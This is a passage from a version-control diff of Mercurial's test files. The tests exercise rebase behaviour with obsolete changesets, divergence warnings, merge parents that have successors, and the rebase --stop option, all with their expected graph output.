17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a 
G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - Skip obsolete changeset even with multiple hops ----------------------------------------------- @@ -1043,1096 +317,3 @@ note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" rebasing 21:7bdc8a87673d tip "dummy change" $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. 
- - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. 
- - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 
'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - note: not rebasing 2:a82ac2b38757 c "c", it has no successor - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ cd .. 
- -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [10] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. 
- - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . 
# working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons 
(--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. 
- $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while 
merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [20] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d 
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [20] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. 
- $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete3.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete3.t @@ -18,1032 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 
drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 